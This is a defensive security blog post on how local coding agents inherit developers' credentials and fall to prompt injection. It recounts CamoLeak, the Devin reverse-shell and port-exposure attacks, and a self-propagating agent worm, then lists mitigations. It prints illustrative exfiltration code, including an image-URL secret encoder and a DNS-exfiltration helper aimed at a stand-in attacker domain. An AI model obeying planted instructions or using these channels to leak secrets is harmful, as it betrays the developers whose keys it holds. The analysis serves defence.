Your Coding Agent Has Your Keys: A Trust Boundary Analysis
When you run a coding agent, it can read every credential on your machine (SSH keys, cloud tokens, API secrets) without asking. It asks before running commands, but the permission is 'allow this command,' not 'allow access to this credential.' The security boundary everyone focuses on is on the wrong side. The real attack surface is the input to the agent's reasoning, not the output.
In October 2025, Legit Security disclosed a vulnerability in GitHub Copilot Chat they called CamoLeak. A security researcher had placed a hidden HTML comment inside a pull request. Invisible when rendered in GitHub's web UI, but fully visible to Copilot when it parsed the raw markdown. The comment contained instructions: search the repository for AWS keys, encode each character of the result as a specific image URL, and render the output.
Copilot followed the instructions. It found the secrets. It encoded them character by character using GitHub's own Camo image proxy (a service designed to prevent tracking) as the exfiltration channel. The victim's browser fetched each 1x1 pixel image in sequence through camo.githubusercontent.com, a domain the Content Security Policy explicitly trusts. The attacker's server logged the sequence of requests and reconstructed the secret.
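The mechanics are simple enough to sketch. The following Python is an illustrative reconstruction, not the actual payload: the attacker pre-generates one proxied 1x1-pixel image URL per possible character, and the secret leaks as the ordered sequence of image fetches. The `camo.example` URLs are placeholders, not the real Camo URL scheme.

```python
# Illustrative sketch of character-by-character image-URL exfiltration.
# Each character maps to a pre-generated image URL; rendering the secret
# as a sequence of those images leaks it through an allowed image domain.

def encode_secret_as_images(secret: str, url_for_char: dict[str, str]) -> list[str]:
    """Map each character of the secret to its pre-generated image URL."""
    return [url_for_char[ch] for ch in secret]

# Attacker's lookup table: one unique (hypothetical) proxied URL per character.
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
url_for_char = {
    ch: f"https://camo.example/{i:02d}.png"  # placeholder, not the real Camo format
    for i, ch in enumerate(alphabet)
}

# A server watching the request log reconstructs the secret from the order
# in which the per-character URLs are fetched.
urls = encode_secret_as_images("AKIA1234", url_for_char)
```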
The developer saw nothing unusual. Copilot's response looked normal. The images were invisible. The CSP didn't fire. No alerts triggered.
Legit Security scored it CVSS 9.6. GitHub's fix was to disable image rendering in Copilot Chat entirely: not a surgical patch, but the removal of an entire exfiltration channel.
CamoLeak is instructive not because of the specific mechanism (GitHub has patched it), but because of the structural condition it exploited: Copilot operated with the developer's full repository access, and a PR comment controlled its intent. The agent had the developer's credentials. An untrusted input had the agent's reasoning. That gap is the subject of this post.
The Implicit Handshake#
When you install a coding agent (Claude Code, Cursor, Windsurf, Copilot) and run it in your terminal or IDE, a transfer of authority happens that is easy to miss.
These agents do ask for permission. Claude Code shows you the bash command before running it. Cursor asks before executing terminal commands. This is real, and it matters. But the permission operates at the wrong level of abstraction. The dialog says "Allow git push?" It does not say "Allow access to your SSH keys for this operation." The dialog says "Allow curl?" It does not say "Allow authenticated HTTP requests using secrets from your environment."
And reading files requires no approval at all. In Claude Code, the Read tool is always-allowed. The agent can silently read ~/.aws/credentials, ~/.ssh/id_rsa, your .env files, and your shell history without triggering any prompt. It needs your approval to execute commands, but it can see every credential on your machine from the moment it starts.
Here is what a local coding agent can read without any approval:
| Credential | Location | What It Enables |
|---|---|---|
| SSH keys | ~/.ssh/id_rsa, id_ed25519 | Push to any Git remote you can access |
| Git identity | ~/.gitconfig | Commit and sign code as you |
| AWS credentials | ~/.aws/credentials, env vars | Provision infrastructure, read production data |
| GCP credentials | application_default_credentials.json | Access any GCP service you're authenticated to |
| Kubernetes config | ~/.kube/config | Deploy to clusters, read secrets |
| Environment files | .env, .env.production | Every API key, database URL, service token in the project |
| npm/PyPI tokens | ~/.npmrc, ~/.pypirc | Publish packages as you |
| Shell history | ~/.bash_history, ~/.zsh_history | Passwords typed as arguments, internal URLs |
| Cloud CLI sessions | ~/.config/gcloud/, ~/.azure/ | Active sessions with whatever roles you hold |
This is ambient authority. The agent doesn't request access to specific credentials. It inherits everything your user account can reach, because it runs as your user. The permission model that exists (command approval) controls what the agent does, not what it can see or what credentials those commands carry.
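None of this requires an exploit; it is plain file access. A few lines of Python (paths taken from the table above) show what any process running with your UID, a coding agent included, can check and read without any approval dialog. This is a local visibility check only; nothing is sent anywhere.

```python
# Which well-known credential files can the current user read?
# Any process running as your user can answer this silently.
import os

CREDENTIAL_PATHS = [
    "~/.ssh/id_rsa",
    "~/.ssh/id_ed25519",
    "~/.aws/credentials",
    "~/.kube/config",
    "~/.npmrc",
    "~/.bash_history",
]

def readable_credentials(paths: list[str]) -> list[str]:
    """Return the subset of paths that exist and are readable as this user."""
    found = []
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full) and os.access(full, os.R_OK):
            found.append(p)
    return found

if __name__ == "__main__":
    for p in readable_credentials(CREDENTIAL_PATHS):
        print(f"readable without any prompt: {p}")
```

Run it on your own machine; the output is usually longer than people expect.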
Compare this with other tooling. When you OAuth into a third-party app, you see a scope consent screen: "This app wants to read your email." When you add a GitHub Action, it gets a scoped GITHUB_TOKEN with permissions you define in the workflow file. When a coding agent runs in your terminal, the permission model is: approve each command, but every approved command runs with your full credentials. There is no mechanism to say "run this aws command, but only with read access to S3, not full admin."
Cloud-hosted agents like Devin and GitHub's Copilot Coding Agent are architecturally different. They run in isolated VMs or containers where credentials must be explicitly provisioned. But the agents most developers use daily (Claude Code, Cursor, Windsurf, Copilot Chat in VS Code) run locally, with full ambient authority.
The Poisoned Context Problem#
If the agent's credentials are yours, who controls the agent's intent?
The obvious answer is: you do. You type the prompt. You describe the task. But the prompt is only one input to the agent's reasoning. It's not even the largest one.
A coding agent builds its decisions from everything in its context window. That context includes your prompt, but it also includes project files, dependency documentation, PR descriptions, issue comments, web pages the agent browses, MCP tool descriptions, and repository configuration files. Most of this content is not yours, and much of it is untrusted.
Your prompt ← trusted
Project files you wrote ← mostly trusted
Cloned dependency READMEs ← untrusted
PR comments from contributors ← untrusted
Web pages the agent browses ← untrusted
MCP tool descriptions ← untrusted
Rules files from repos ← untrusted
This is the context supply chain. Every layer influences the agent's behavior, and every layer below your prompt is a potential injection point. The agent reasons over all of it indiscriminately. There is no "trusted" bit on a token in the context window.
CamoLeak exploited the PR comment layer. But the same structural condition exists at every layer, and researchers have demonstrated exploitation at each one.
Three Stories About the Same Problem#
Story 1: Devin Opens Your Ports to the Internet#
In August 2025, security researcher Johann Rehberger spent $500 on a Devin subscription and systematically tested it for prompt injection. He planted instructions on a website he controlled. When Devin was tasked with investigating a GitHub issue that linked to that website, it followed the link and read the attacker's instructions.
The instructions told Devin to download a binary from an attacker-controlled server and execute it. The binary was a Sliver C2 agent, a legitimate red-team tool that establishes a reverse shell. When the first execution attempt failed with a permission error, Devin independently opened a new terminal, ran chmod +x on the binary, and tried again. The reverse shell connected. Rehberger had full remote access to Devin's environment, including AWS credentials stored there.
But the scariest finding was a separate exploit. Devin has an undocumented built-in tool called expose_port that generates a public URL on the devinapps.com domain, making any local port accessible from the internet. There is no confirmation dialog. No IP restriction. Rehberger demonstrated a multi-stage prompt injection that caused Devin to start a Python file server exposing the local filesystem, then invoke expose_port to make it publicly accessible, then exfiltrate the public URL to the attacker via a markdown image rendering trick.
A prompt injection on a web page gave a remote attacker a public URL to every file in Devin's environment.
Rehberger reported all findings to Cognition on April 6, 2025. After an initial acknowledgment, no fixes were communicated and no coordinated disclosure happened. He published after waiting over 120 days, exceeding the standard 90-day responsible disclosure window.
Story 2: The Agent Ships Your Secrets Faster Than You Can Review Them#
An agent generates a config file. It works. The developer reviews the diff for correctness, not for credentials. The commit ships with a hardcoded API key that the agent pulled from context, or invented as a placeholder, or copied from a Stack Overflow answer in its training data. The pre-commit hook that would have caught it wasn't installed, because the project is three days old and moving fast.
GitGuardian's 2026 State of Secrets Sprawl report measured this at scale. They analyzed 1.94 billion public GitHub commits from 2025 and identified Claude Code-assisted commits using the Co-Authored-By git trailer. The finding: 3.2% of Claude Code-assisted commits contained at least one hardcoded secret, roughly double the 1.5% baseline. At the peak in August 2025, Claude Code commits hit 31 secrets per 1,000 commits.
Some context on that number. It's a per-commit metric, and Claude Code commits are consistently ~2x larger than human-only commits, so part of the gap is surface area. GitGuardian does not frame it as a tool failure. They point to speed (developers accepting generated code without credential review), volume (more lines per commit, more places for a secret to hide), and inexperience (54% of developers active on GitHub in 2025 made their first commit that year). After the release of Claude Sonnet 4.5 in late September 2025, the leak rate converged with baseline by December.
But the months-long window of elevated exposure affected millions of commits. And the broader trajectory is stark: 28.65 million new hardcoded secrets were pushed to public GitHub in 2025, a 34% year-over-year increase. Secrets are growing 1.6 times faster than the developer population. The agent didn't create this problem. It accelerated it.
Story 3: Every Agent, Same Vulnerability#
Rehberger didn't stop at Devin. Through August 2025, in what Simon Willison called "The Summer of Johann," he published 29 vulnerability reports in 31 days, testing every major coding agent on the market. The results were remarkably consistent.
| Agent | Vulnerability |
|---|---|
| Claude Code | Pre-approved commands (ping, dig) used as DNS exfiltration channels |
| Cursor | Mermaid diagram rendering exploited for invisible image-based data exfiltration |
| GitHub Copilot | Tricked into editing ~/.vscode/settings.json to set "chat.tools.autoApprove": true |
| Google Jules | Unrestricted outbound internet access; markdown image exfiltration; invisible Unicode injection |
| Amazon Q | Secrets leaked via DNS; remote code execution via prompt injection |
| Windsurf | Memory-persistent data exfiltration ("SpAIware"); prompt injection via invisible instructions |
| OpenHands | Environment variable exfiltration; malware download and execution |
| Amp Code | Manipulated into editing its own settings.json to enable unauthorized MCP servers |
Every agent fell to the same structural pattern: untrusted content entered the context window, the agent followed the instructions in that content, and the instructions exercised the agent's ambient credentials in ways the developer never intended.
Rehberger distilled the pattern into a kill chain: prompt injection → confused deputy → automatic tool invocation. The attacks didn't need to bypass approval dialogs head-on. They worked around them: using pre-approved commands (Claude Code's ping and dig for DNS exfiltration), manipulating the approval system itself (Copilot editing settings.json to enable auto-approval), or exploiting features that never required approval in the first place (image rendering, file reads). The permission layer exists. The attacks route around it.
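The DNS channel in particular is worth making concrete. A pre-approved `ping` or `dig` carries data in the hostname itself: the secret is encoded into DNS labels, and the lookup delivers it to whoever runs the authoritative nameserver. The sketch below is illustrative; the attacker domain is hypothetical.

```python
# Sketch of DNS exfiltration through an approved lookup command. The
# secret is hex-encoded and split into DNS labels (63 chars max each),
# then appended to an attacker-controlled domain. Running `dig` on the
# resulting name sends the data to that domain's nameserver.

def dns_exfil_name(secret: str, attacker_domain: str = "evil.example") -> str:
    hex_data = secret.encode().hex()
    labels = [hex_data[i:i + 63] for i in range(0, len(hex_data), 63)]
    return ".".join(labels + [attacker_domain])

# An agent tricked into running `dig <name>` leaks the secret in the query.
name = dns_exfil_name("AKIA1234SECRET")
```

No approval dialog flags this, because `dig` itself was pre-approved; the hostname is just an argument.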
He also published AgentHopper, a proof-of-concept agent worm that propagates through Git repositories. A compromised agent injects prompt injection payloads into source code and pushes them to GitHub. When another developer's agent pulls the infected code, it gets compromised and repeats the cycle. The payload adapts per agent type: it modifies settings.json for Copilot, injects MCP server configs for Claude Code, and uses find -exec for Amazon Q.
A self-propagating prompt injection worm. In August 2025.
The Trust Boundary Diagram#
Every story above follows the same pattern. Here it is as a picture:
┌───────────────────────────────────────────────────────┐
│ AGENT CONTEXT WINDOW │
│ │
│ Your prompt (trusted) │
│ CLAUDE.md / .cursorrules (semi-trusted) │
│ Project source code (semi-trusted) │
│ Dependency docs and READMEs (untrusted) ←── poisoned here
│ PR descriptions and comments (untrusted) ←── or here
│ Web pages browsed during research (untrusted) ←── or here
│ MCP server tool descriptions (untrusted) ←── or here
│ Cloned repository config files (untrusted) ←── or here
│ │
└──────────────────────┬────────────────────────────────┘
│
Agent Reasoning
│
┌──────▼──────┐
│ Approval │ ← the command looks legitimate
│ Prompt │
└──────┬──────┘
│
┌──────────────┼──────────────┐
▼ ▼ ▼
Your SSH keys Your .env Your cloud creds
The approval prompt is a real security control. It prevents a meaningful class of accidents. But it asks the wrong question. "Allow git push?" is not the same question as "Allow the agent to push a commit that a PR comment instructed it to create?" "Allow curl?" is not the same as "Allow an HTTP request to an attacker's server with secrets from your environment in the payload?" The command looks legitimate. The intent behind it is shaped by content you never reviewed.
In security, this is the confused deputy problem (Norm Hardy, 1988). A deputy (the agent) acts on behalf of a principal (you) using the principal's authority (your credentials). The attack works because a different principal (untrusted content in the context window) controls the deputy's intent while you supply the deputy's authority. The deputy is confused about on whose behalf it is acting. The approval prompt doesn't resolve this confusion, because the prompt shows the action, not the reason for the action.
What You Can Do Today#
The fundamental fix (scoped, per-agent credential delegation with task-specific authority) doesn't exist yet for local coding agents. No major agent implements per-command environment variable filtering, credential vaulting with just-in-time access, or capability-based security where the agent requests specific credentials and you approve each one.
That doesn't mean you're defenseless. The mitigations below reduce the blast radius when (not if) untrusted content influences your agent's behavior.
Use short-lived credentials instead of long-lived keys. aws-vault stores your AWS credentials in the OS keychain and issues temporary STS sessions. If an agent exfiltrates a session token, it expires in hours. aws sso login works similarly. The same principle applies everywhere: GitHub fine-grained PATs with repository-level scope and expiration. Database users with read-only access for development. Short-lived tokens limit the window of exploitation.
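With AWS SSO (IAM Identity Center), for example, the profile in `~/.aws/config` holds no secret material at all; `aws sso login --profile dev` runs a browser auth flow and caches a short-lived session. All values below are placeholders.

```ini
# ~/.aws/config — an SSO profile contains no long-lived key material.
# If an agent reads this file, there is nothing worth exfiltrating;
# the session credentials it mints expire on their own.
[profile dev]
sso_start_url = https://example.awsapps.com/start
sso_region = us-east-1
sso_account_id = 111111111111
sso_role_name = DeveloperReadOnly
region = us-east-1
```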
Run pre-commit secret scanning. Tools like gitleaks and trufflehog in a pre-commit hook catch secrets before they reach the repository. This directly addresses the GitGuardian finding: the agent generates code with an embedded credential, the hook blocks the commit, you see the problem before it ships. The agent doesn't bypass hooks unless it runs --no-verify, which should be a red flag.
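With the pre-commit framework, wiring gitleaks in is a few lines; pin `rev` to a current release.

```yaml
# .pre-commit-config.yaml — run gitleaks on every commit.
# A commit containing a detectable secret fails before it is created.
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4   # pin to whatever the current release is
    hooks:
      - id: gitleaks
```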
Scope your shell environment. direnv loads and unloads environment variables when you enter and leave directories. Keep production credentials in a separate directory's .envrc that you never open with an agent. For stronger isolation, run the agent inside a VS Code Dev Container with only the credentials the current task requires, explicitly mounted.
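A minimal direnv layout under this scheme (paths and variable names illustrative): the project directory loads only development-scoped credentials, and the production `.envrc` lives in a directory no agent session is ever started from.

```sh
# ~/projects/myapp/.envrc — direnv loads this on `cd` in, unloads on `cd` out.
# Development-scoped credentials only. Production credentials live in a
# separate directory's .envrc that you never open with an agent.
export AWS_PROFILE=dev
dotenv_if_exists .env.development  # direnv stdlib: load KEY=value pairs if present
```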
Use ssh-add -c for SSH key confirmation. This flag requires OS-level confirmation every time your SSH key is used. When the agent runs git push, you see a system dialog asking to confirm the key use. It's an extra click, but it makes SSH key abuse visible.
Audit rules files before running agents in cloned repositories. .cursorrules, CLAUDE.md, .github/copilot-instructions.md: these files shape agent behavior and are checked into repositories. Treat them like you'd treat a Makefile: they're executable configuration. A malicious rules file in a forked repo can reshape how the agent operates on your machine with your credentials.
Be specific with tool approval patterns. In Claude Code, configure .claude/settings.json with specific allowedTools patterns rather than blanket approvals. Bash(make *) and Bash(go test *) are meaningfully safer than Bash(*). The narrower the pattern, the less room for a confused deputy to exercise unexpected authority.
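In `settings.json` form, scoped patterns look roughly like the sketch below. The exact pattern syntax varies by agent version, so check the current Claude Code documentation before copying; the patterns here are examples.

```json
{
  "permissions": {
    "allow": [
      "Bash(make *)",
      "Bash(go test *)"
    ],
    "deny": [
      "Bash(curl *)"
    ]
  }
}
```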
Treat agent sessions like CI/CD pipelines. The credential hygiene practices that are standard for CI/CD (scoped tokens, no long-lived secrets, explicit secret injection, audit logging) apply directly to coding agent sessions. You wouldn't put your personal AWS root keys in a GitHub Actions workflow. Don't leave them accessible to your coding agent either.
The Structural Gap#
Every mitigation above is a workaround. The structural problem remains: local coding agents inherit the Unix user model's ambient authority without inheriting any of the decades of work on capability-based security, mandatory access controls, or least-privilege enforcement.
The OWASP Top 10 for Agentic Applications, published in December 2025, names this directly. ASI03, "Agent Identity & Privilege Abuse," describes the risk when agents operate with excessive, unscoped, or inherited privileges. Their recommended mitigations (scoped short-lived credentials, distinct agent identity, runtime privilege boundaries, just-in-time credential access) read like a spec for a system that doesn't exist yet.
The industry has two early models for what isolation could look like. Devin runs in a cloud VM where credentials are explicitly provisioned rather than inherited. GitHub's Copilot Coding Agent runs in a container with a scoped GITHUB_TOKEN. Both demonstrate that isolation-by-architecture is possible. But neither model applies to the agents developers use every day in their terminals and IDEs, and neither provides fine-grained, per-task credential scoping.
The question isn't whether coding agents should have access to credentials. They need credentials to do useful work. The question is whether "all credentials, all the time, with no scoping, no audit trail, and intent shaped by untrusted input" is a reasonable default. It is the default today. For every major local coding agent. On every developer's machine.
The trust boundary diagram in this post isn't a theoretical framework. It's a description of what is happening right now, on millions of machines, every time a developer asks an agent to help with a pull request.
Sources#
Vulnerability Research#
- Legit Security: CamoLeak, Critical GitHub Copilot Vulnerability Leaks Private Source Code, October 2025
- Embrace The Red: I Spent $500 To Test Devin AI For Prompt Injection, August 2025
- Embrace The Red: How Devin AI Can Leak Your Secrets via Multiple Means, August 2025
- Embrace The Red: AI Kill Chain, Devin AI Exposes Ports to the Internet, August 2025
- Simon Willison: The Summer of Johann, August 2025
Data and Reports#
- GitGuardian: State of Secrets Sprawl 2026, March 2026
- GitGuardian: AI-Service Leaks Surge 81% and 29M Secrets Hit Public GitHub, March 2026
Standards and Frameworks#
- OWASP Top 10 for Agentic Applications, December 2025
- Norm Hardy: The Confused Deputy (or why capabilities might have been invented), 1988
Related posts#
Prompt Injection Is Not the Incident
Prompt injection detection is getting better, but what happens when the exploit doesn't look like an exploit? We split a credential-stealing attack across two normal-looking tickets and watched a coding agent execute both. The fix isn't better detection. It's controlling what agents can do.
Your Agent Passed OAuth. Now What?
OAuth was designed for humans clicking 'Authorize' in a browser. AI agents don't click anything. The protocol's core assumptions (human presence, static scopes, one-time consent, bearer semantics) break in ways that have already caused real breaches. The industry is converging on proof-of-possession. Here's why, and what comes after.